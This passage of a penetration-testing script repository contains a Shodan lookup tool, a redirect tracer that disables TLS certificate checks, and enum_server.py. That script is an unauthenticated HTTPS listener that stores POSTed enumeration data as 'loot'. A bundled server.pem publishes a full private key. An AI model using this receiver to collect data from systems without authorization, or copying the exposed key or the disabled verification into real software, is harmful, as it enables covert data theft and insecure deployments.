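    # services and is printed unmodified - confirm before feeding this
    # output to anything that interprets control characters.
    for item in result['data']:
        print("Port: " + str(item['port']))
        print("Banner: " + item['banner'])


def _report_host_error(error, not_found_message):
    """Explain an exception raised by a host() lookup; exit on a bad key."""
    reason = str(error).strip()
    if reason == "API access denied":
        print("You provided an invalid API Key!")
        print("Please provide a valid API Key and re-run!")
        sys.exit()
    elif reason == "No information available for that IP.":
        print(not_found_message)
    else:
        print("[*]Unknown Error: " + str(error))


def _print_match(result):
    """Print one entry of a string search's 'matches' list."""
    print("*** RESULT ***")
    print("IP Address: " + result['ip'])
    if result['country_name'] is not None:
        print("Country: " + result['country_name'])
    if result['updated'] is not None:
        print("Last updated: " + result['updated'])
    if result['port'] is not None:
        print("Port: " + str(result['port']))
    print("Data: " + result['data'])
    for hostname in result['hostnames']:
        # A None entry cannot be concatenated to the label
        if hostname is not None:
            print("Hostname: " + hostname)
    print("")


def shodan_cidr_search(shodan_search_object, shodan_search_cidr, input_file_ips):
    """Look up every address of a CIDR range, or of an input file, on Shodan.

    shodan_search_cidr is the range string, or False to read the targets
    from input_file_ips (one address per line) instead.  The script exits
    when the range is invalid, the file cannot be read, or neither source
    was supplied.
    """
    title()

    if shodan_search_cidr is not False:

        if not validate_cidr(shodan_search_cidr):
            print("[*] ERROR: Please provide valid CIDR notation!")
            sys.exit()

        print("[*] Searching Shodan for info about " + shodan_search_cidr)

        # Create cidr notated list
        network = IPNetwork(shodan_search_cidr)

    elif input_file_ips:
        try:
            with open(input_file_ips, 'r') as ips_provided:
                # Drop the line endings and blank lines; a target with a
                # trailing newline is not a valid address to look up
                network = [line.strip() for line in ips_provided
                           if line.strip()]
        except IOError:
            print("[*] ERROR: You didn't provide a valid input file.")
            print("[*] ERROR: Please re-run and provide a valid file.")
            sys.exit()

    else:
        # Neither source given: nothing to iterate over
        print("[*] ERROR: You didn't provide a valid input file.")
        print("[*] ERROR: Please re-run and provide a valid file.")
        sys.exit()

    # search shodan for each IP
    for ip in network:
        target = str(ip)

        print("\n[*] Searching specifically for: " + target)

        try:
            # Search Shodan
            result = shodan_search_object.host(target)
            _print_host_result(result)

        except Exception as e:
            _report_host_error(
                e, "No information is available for " + target)


def shodan_ip_search(shodan_search_object, shodan_search_ip):
    """Look up a single address on Shodan and print what is stored for it.

    The script exits when shodan_search_ip does not pass validate_ip().
    """
    title()

    if not validate_ip(shodan_search_ip):
        print("[*]ERROR: You provided an invalid IP address!")
        print("[*]ERROR: Please re-run and provide a valid IP.")
        sys.exit()

    print("[*] Searching Shodan for info about " + shodan_search_ip + "...")

    try:
        # Search Shodan
        result = shodan_search_object.host(shodan_search_ip)
        _print_host_result(result)

    except Exception as e:
        _report_host_error(
            e, "No information on Shodan about " + str(shodan_search_ip))


def shodan_string_search(shodan_search_object, shodan_search_string,
                         hostname_only, page_to_return):
    """Run a free-text Shodan search and print one page of matches.

    With hostname_only set, only matches that carry at least one stored
    hostname are printed, each of them once.
    """
    title()

    # Try/catch for searching the shodan api
    print("[*] Searching Shodan...\n")

    try:
        # Time to search Shodan
        results = shodan_search_object.search(
            shodan_search_string, page=page_to_return)

        if not hostname_only:
            print("Total number of results back: " +
                  str(results['total']) + "\n")

        for result in results['matches']:
            has_hostname = any(
                name is not None for name in result['hostnames'])
            if hostname_only and not has_hostname:
                continue
            _print_match(result)

    except Exception as e:
        if str(e).strip() == "API access denied":
            print("You provided an invalid API Key!")
            print("Please provide a valid API Key and re-run!")
            sys.exit()
        else:
            # Report other failures instead of ending silently
            print("[*]Unknown Error: " + str(e))


def title():
    """Clear the terminal and print the banner."""
    os.system('clear')
    print("##################################################################")
    print("# Shodan Search #")
    print("##################################################################\n")

    return


def validate_cidr(val_cidr):
    """Return True when val_cidr looks like address/mask with mask <= 32.

    The address part is checked with validate_ip(), so it follows the same
    rules (including the shortened forms that function accepts).
    """
    if not _CIDR_RE.match(val_cidr):
        return False
    ip, mask = val_cidr.split('/')
    if not validate_ip(ip):
        return False
    return int(mask) <= 32


def validate_ip(val_ip):
    """Return True when val_ip is one to four dot-separated values <= 255.

    The pattern allows fewer than four groups, so shortened forms such as
    "10.1" pass this check as well as full dotted quads.
    """
    if not _IP_RE.match(val_ip):
        return False
    return all(int(quad) <= 255 for quad in val_ip.split('.'))


if __name__ == '__main__':

    # Parse command line options
    search_string, search_ip, search_cidr, search_hostnameonly,\
        search_page_number, search_file = cli_parser()

    # Create object used to search Shodan
    shodan_api_object = create_shodan_object()

    # Determine which action will be performed
    if search_string is not False:
        shodan_string_search(shodan_api_object, search_string,
                             search_hostnameonly, search_page_number)

    elif search_ip is not False:
        shodan_ip_search(shodan_api_object, search_ip)

    elif search_cidr is not False or search_file is not None:
        shodan_cidr_search(shodan_api_object, search_cidr, search_file)

    else:
        print("You didn't provide a valid option!")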
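--------------------------------------------------------------------------------
/WebScripts/WebTrace.rb:
--------------------------------------------------------------------------------
#!/usr/bin/env ruby

require 'net/http'
require 'net/https'
require 'uri'

# The fetch function was based off of the function at the following URL
# http://stackoverflow.com/questions/6934185/ruby-net-http-following-redirects

# Follows every response that Net::HTTP classifies as a redirection (3xx)
# This script came to fruition after @digininja requesting this feature be added to EyeWitness
# Thanks to @digininja for the suggestion and great idea. This has been added in to EyeWitness too.

# Requests uri_str and appends one line per hop to url_list, following
# redirects until a success response is reached.
#   uri_str  - http:// or https:// URL to request
#   url_list - array that receives the "... redirects to..." / "<- Final URL" lines
#   limit    - redirects still allowed; ArgumentError is raised at 0
# Any response that is neither a success nor a redirect is raised through
# response.error!.
def fetch(uri_str, url_list, limit = 10)
  # This checks up to 10 redirects. If it keeps going further, change the limit value
  raise ArgumentError, 'HTTP redirect too deep' if limit == 0

  uri = URI.parse(uri_str)

  # Anything that is not http(s) used to leave the connection object unset
  # and fail later with a NoMethodError; reject it up front instead.
  unless uri.is_a?(URI::HTTP)
    raise ArgumentError, "Unsupported URL scheme: #{uri_str}"
  end

  # code came from - http://www.rubyinside.com/nethttp-cheat-sheet-2940.html
  http = Net::HTTP.new(uri.host, uri.port)
  if uri.is_a?(URI::HTTPS)
    http.use_ssl = true
    # Certificate verification is switched off, so the HTTPS hops recorded
    # here are not authenticated: anything able to intercept the
    # connection can alter the chain that gets reported. Use
    # OpenSSL::SSL::VERIFY_PEER when the result has to be trusted.
    http.verify_mode = OpenSSL::SSL::VERIFY_NONE
  end
  request = Net::HTTP::Get.new(uri.request_uri)

  response = http.request(request)
  case response
  when Net::HTTPSuccess
    url_list.push("#{uri_str} <- Final URL")
  when Net::HTTPRedirection
    url_list.push("#{uri_str} redirects to...")
    location = response['location']
    # A redirect without a Location header cannot be followed
    response.error! if location.nil?
    # URI.join resolves a relative target against the current URL, which
    # keeps a non-default port and handles paths without a leading slash
    fetch(URI.join(uri_str, location).to_s, url_list, limit - 1)
  else
    response.error!
  end
end

# Check to make sure we have only one argument, the URL
if ARGV.length != 1
  puts "[*] Error: Please provide a URL to check for redirects!"
  puts "[*] Usage: ./WebTrace.rb "
  exit
end

# Check to make sure it's a valid URL
unless ARGV[0] =~ URI::regexp
  puts "[*] Error: Please provide a valid URL!"
  puts "[*] Usage: ./WebTrace.rb "
  exit
end

# Array which will store all redirects
all_urls = []

# Function that checks for redirects
fetch(ARGV[0], all_urls)

# If no redirects, say so. Otherwise, list all redirects
if all_urls.length == 1
  puts "No Redirection"
else
  all_urls.each do |ind_url|
    puts ind_url
  end
end

--------------------------------------------------------------------------------
/WebScripts/enum_server.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

import os
import socket
import ssl
import sys
import time
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
from SocketServer import ThreadingMixIn
from threading import Thread

# Port the HTTPS listener binds to
LISTEN_PORT = 443


class GetHandler(BaseHTTPRequestHandler):
    """Request handler that stores POSTed data and serves no content."""
    # Some of the http server code came from Dave Kennedy's AES shell
    # over http - the server specific code

    # Largest request body that will be read and stored.  The length is
    # announced by the client, so it needs an upper bound.
    MAX_UPLOAD_BYTES = 10 * 1024 * 1024

    # should be performing GET requests Help from
    # http://pymotw.com/2/BaseHTTPServer/
    def do_GET(self):
        """Answer every GET with 404; this server only receives data."""
        print("Someone is trying to make a GET request to this server...")
        # 404 since we aren't serving up any pages, only receiving data
        self.send_response(404)
        self.end_headers()
        return

    # handle post request
    def do_POST(self):
        """Append the body of a POST to /post_enum_data.php to a file in ./data.

        The request path is the only thing checked before data is
        accepted: there is no authentication, so any client able to reach
        the listener can write files here.  Bodies larger than
        MAX_UPLOAD_BYTES are refused with 413 and a missing or malformed
        Content-Length with 400.  Every other path gets a 404.
        """
        # All other Post requests
        if self.path != "/post_enum_data.php":
            self.send_response(404)
            self.end_headers()

            print("Odd... someone else is trying to access this web server...")
            print("Might want to check that out...")
            return

        # Content-Length is supplied by the client: a missing or
        # non-numeric value would raise, a negative one would make read()
        # wait for end of stream, and a huge one would be read into memory.
        try:
            body_length = int(self.headers.get('content-length'))
        except (TypeError, ValueError):
            body_length = -1
        if body_length < 0:
            self.send_response(400)
            self.end_headers()
            return
        if body_length > self.MAX_UPLOAD_BYTES:
            self.send_response(413)
            self.end_headers()
            return

        # Info for this from -
        # http://stackoverflow.com/questions/13146064/simple-
        # python-webserver-to-save-file
        self.send_response(200)
        self.end_headers()

        # Uploads are stored in a "data" directory below the current
        # working directory; create it when it does not exist yet
        loot_path = os.path.join(os.getcwd(), "data")
        if not os.path.isdir(loot_path):
            os.makedirs(loot_path)

        # File name is built from the date and time only, never from
        # anything in the request
        upload_name = time.strftime("%m%d%Y_%H%M%S") + "enumeration_data.txt"

        # Read the announced number of bytes of the upload
        upload_data = self.rfile.read(body_length)

        # Write out the file
        with open(os.path.join(loot_path, upload_name), 'ab') as cc_data_file:
            cc_data_file.write(upload_data)
        return


class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
    """HTTPServer that handles each request in its own thread."""
    pass


def serve_on_port():
    """Serve HTTPS on every interface at LISTEN_PORT until the process ends.

    Exits the calling thread with a message when the socket cannot be set up.
    """
    try:
        # NOTE: web/server.pem is distributed with these scripts and holds
        # the private key, so that key is not secret.  Generate a fresh
        # certificate and key for each deployment rather than reusing it.
        cert_path = os.path.join(
            os.path.dirname(os.path.realpath(__file__)), 'web', 'server.pem')
        server = ThreadingHTTPServer(
            ("0.0.0.0", LISTEN_PORT), GetHandler)
        server.socket = ssl.wrap_socket(
            server.socket, certfile=cert_path, server_side=True)
        server.serve_forever()
    except socket.error:
        # LISTEN_PORT is a defined name, so this message can be formatted
        print("[*][*] Error: Port %d is currently in use!" % LISTEN_PORT)
        print("[*][*] Error: Please restart when port is free!\n")
        sys.exit()
    return


try:
    print("[*] Starting web (https) server...")
    # bind to all interfaces
    Thread(target=serve_on_port).start()
    print("[*] Web server is currently running")
    print("[*] Type \"kill -9 " + str(os.getpid()) + "\" to stop the web server.")
# handle keyboard interrupts
except KeyboardInterrupt:
    print("[!] Rage quiting, and stopping the web server!")

--------------------------------------------------------------------------------
/WebScripts/web/server.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN PRIVATE KEY-----
2 | MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDCwrE5UD+myTPe
3 | ogF3/NYu2i29XMik6/Bs7lYrgDo0kNzZjALkUqt8KZz/s7Z32zmZvqjxadtbwktv
4 | 3yTvvEm/9fhIMLYEXeZCyPYFCMyW04fB6n5fyOtd6JaHTJFdiB4LGgleX1rniQ0X
5 | eUM0oR4Y+ToPF1oUgPvAPLCffeednTJWW38S642Igdv31dMnm8lDNoFtkSnGEPyA
6 | WfoEfT5xO/4Osorch3gh1wLOcWLdRixa98ZU4c7ZmFLj1nN6tIY1/fbJSCS/UHkF
7 | 0OOBzuJib3sGksO0X7KH8GqWja+sVCE3BUWbrhR0n0zEjJWvIfUKtg+wMCfDPXSH
8 | EbQml1PBAgMBAAECggEActBpv9riG0Xj0Sx6Zyzjay1t54NKOYdp7h23KN/n8FMy
9 | DwGuNsHRnFm/1zIvsIrJcyxl1iPMkFSDOkk3Miky5PpxSsWEmCBu/RIRjrg4O/Yp
10 | wxSlOXxt3KegDdUCoTv8UhkgSsU2BubRk/QFvYH6B0jthDYFAa9kOljM2slTgKNC
11 | 4Y1zJx/0ej3P74G337v8ehvFS+xvc+DG1vSgHaEmKQfENSEwkOFzJWy2FFFLkul6
12 | a8cG2+aLbRKP3mydABxRRhaOI0nn81QmUt4lJMGLVgmNIOG5kNRgBg/rmbswlEeq
13 |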
uqxdTI5wRjnWncmc5RyvNSMhSyx5fNq95KRIXamiLQKBgQDg9WmwI/DDO8R3RlZG 14 | ALEF7YbWFO23yEm+aORnfgjKfOaqazwMoyYu+X5OxfC8lZNfrATf7p93fcCWRmm8 15 | xzTE7MxPi0LcgWMrfsVZ39smR11QMqHjgp4jq23feHk1SduquG76eKKWgLckJdnp 16 | jgrLW3mEgixX30FlzCm/Qz023wKBgQDdoop522Ri++tN9QAzlyawL0J89XXlFbrt 17 | LN8tznqhP9agjh/Hcuobt26KItbAAFQEcnS/boafB4TTFz/OQJEjsAuw1oHU618b 18 | 0y0Q0b3gifWzTZqglHjsbQTvM17/++ImPJjTKjq1+OAujzReEZ1aUkbHNdk3CzP7 19 | z1wXrPHpXwKBgQCzoqUTt49xh096Y1tPKQwzDJqIZ0vwXuqsNvx0vArvDs/vNBRO 20 | jxVVm3tGEgALx3FYi3eVDeqfM3bPSUj0KyqzOdhoiG8Kv/Nd7yxOeVh5d7FG8jee 21 | AlafaywgsAYyDFlyOTa9oglLH1ufbO5W90sdWl1t97jLLob9cAvCJEJEhwKBgCdw 22 | Ww/gGHb8uRyAMm77wKitYDl4PGhte3vk9jniejPjdj/PypvlOP+Bnqv6ExjLdifs 23 | bhX6hv4Zims9wd7j4m/lTc9D/Ip079G1vFk32X/xTMWBU7ircvEvXSdrjsYiflWr 24 | hs5cv2HOTaY7WWg73jJKXcnpLSP8XF28wnh8D/glAoGBAJQFEH0xKEtdeEX0Sh6e 25 | Y96Kea3nQvjV3qK7mr6JhR/b/UzOJcQsQOGcmad46CvZXXCy7gLuKzN6X56x2bhF 26 | f2oiRBZN7ZWAvAg8eFvFI7eaNA3GVsp9NDCx/ONuVNHYqR9jYPMfp+8dMm8c5AxR 27 | vFn/gCI5kFRoRqYcPgfwIHOp 28 | -----END PRIVATE KEY----- 29 | -----BEGIN CERTIFICATE----- 30 | MIIEHzCCAwegAwIBAgIJALEp+z0jP13qMA0GCSqGSIb3DQEBCwUAMIGlMQswCQYD 31 | VQQGEwJVUzERMA8GA1UECAwIVmlyZ2luaWExEDAOBgNVBAcMB0ZhaXJmYXgxGDAW 32 | BgNVBAoMD1Rlc3QgRW51bWVyYXRvcjEMMAoGA1UECwwDd2ViMR8wHQYDVQQDDBYq 33 | LmVudW1lcmF0aW9uLXRlc3QuY29tMSgwJgYJKoZIhvcNAQkBFhlhZG1pbkBlbnVt 34 | ZXJhdGlvbnRlc3QuY29tMB4XDTE2MDUwMjIwMjgxNloXDTE3MDUwMjIwMjgxNlow 35 | gaUxCzAJBgNVBAYTAlVTMREwDwYDVQQIDAhWaXJnaW5pYTEQMA4GA1UEBwwHRmFp 36 | cmZheDEYMBYGA1UECgwPVGVzdCBFbnVtZXJhdG9yMQwwCgYDVQQLDAN3ZWIxHzAd 37 | BgNVBAMMFiouZW51bWVyYXRpb24tdGVzdC5jb20xKDAmBgkqhkiG9w0BCQEWGWFk 38 | bWluQGVudW1lcmF0aW9udGVzdC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw 39 | ggEKAoIBAQDCwrE5UD+myTPeogF3/NYu2i29XMik6/Bs7lYrgDo0kNzZjALkUqt8 40 | KZz/s7Z32zmZvqjxadtbwktv3yTvvEm/9fhIMLYEXeZCyPYFCMyW04fB6n5fyOtd 41 | 6JaHTJFdiB4LGgleX1rniQ0XeUM0oR4Y+ToPF1oUgPvAPLCffeednTJWW38S642I 42 | gdv31dMnm8lDNoFtkSnGEPyAWfoEfT5xO/4Osorch3gh1wLOcWLdRixa98ZU4c7Z 43 | 
mFLj1nN6tIY1/fbJSCS/UHkF0OOBzuJib3sGksO0X7KH8GqWja+sVCE3BUWbrhR0 44 | n0zEjJWvIfUKtg+wMCfDPXSHEbQml1PBAgMBAAGjUDBOMB0GA1UdDgQWBBSB82qn 45 | R1q07QsTtv12RUWsMiKdRTAfBgNVHSMEGDAWgBSB82qnR1q07QsTtv12RUWsMiKd 46 | RTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBFhaFkplKGS4aVJXny 47 | s5a2e5zw70/N0KXKAFB0SyxqnmmaLmsu0/j7VZRITuAJwtU54YzyekqcM6Ba+vqz 48 | l6Yg1U8mM68H6vrSVCyLkIQB/s4Rka3NvjfLHRm6WQ/EfrpzUKEq5zh+MjKREaww 49 | sUhetd4uMP81Hx/+IOSNpjyFp8WZlrYKPGu822GhaW+e76ERV7m6YN/65URD3Zow 50 | glva2R8CC8kzno0ft/Z6NUPtf0tLJ7lcntJZQwRZKIuSfvRjHXVpnkA5hc930ktH 51 | xT6KuTTrN61oLP9LqB9IKqZAt/JwTntXqHJWOJc0IFy/Hu8il62ANaNQ4RSeypvK 52 | LCP+ 53 | -----END CERTIFICATE----- 54 | --------------------------------------------------------------------------------